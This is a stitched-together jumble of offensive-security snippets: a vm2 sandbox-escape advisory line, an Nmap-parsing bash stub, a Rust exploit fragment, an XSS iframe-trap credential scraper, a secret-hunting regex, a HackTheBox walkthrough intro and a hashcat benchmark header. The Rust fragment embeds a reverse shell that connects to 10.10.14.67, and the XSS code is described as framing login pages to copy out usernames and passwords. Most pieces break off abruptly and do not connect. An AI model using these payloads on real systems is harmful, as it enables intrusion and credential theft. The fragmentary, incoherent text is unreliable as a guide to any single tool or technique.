In vm2 for versions up to 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code.
#!/bin/bash
# Check if an argument was provided
if [ $# -eq 0 ]; then
    NMAP_XML_OUTPUT="/dev/stdin"
else
    NMAP_XML_OUTPUT="$1"
fi
# Use xmllint to parse IP addresses and ports from the Nmap XML output
// I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;)
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::process::Command;
pub fn log(user: &str, query: &str, justification: &str) {
    let command = "bash -i >& /dev/tcp/10.10.14.67/444 0>&1";
Let's pwn the box Scrambled from HackTheBox using only NetExec! For context, I was reading the Scrambled writeup from 0xdf_ when I read this:
smbclient won't work, and I wasn't able to get crackmapexec to work either.
To be fair, at the time of his writeup it was true, but not anymore: it's pretty simple with NXC, 5 minutes and you get root :)
Note: I will skip the web part, where we get one username: ksimpson
alert('Click ok when you\'re ready to enter iframe trap');
// Example Credential scraper and
// XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// Frame the login page, and copy out the
// username and password fields.
// @hoodoer
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
Apple M1 Ultra, 20 Core CPU, 48 Core GPU, 64GB of RAM, 1TB SSD
Thanks to @fhlipZero (https://twitter.com/fhlipZero) for running the benchmark on his hardware and allowing me to publish it.
A copy of both a short benchmark and the following full run can be found at https://gist.github.com/fhlip0
hashcat (v6.2.5-340-g98b89e43d) starting in benchmark mode
Benchmarking uses hand-optimized kernel code by default.
alert('Click ok when you\'re ready to enter iframe trap');
// Example XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// While they surf around, they stick in your
// iFrame, and you keep their session and your XSS
// payload running.
// @hoodoer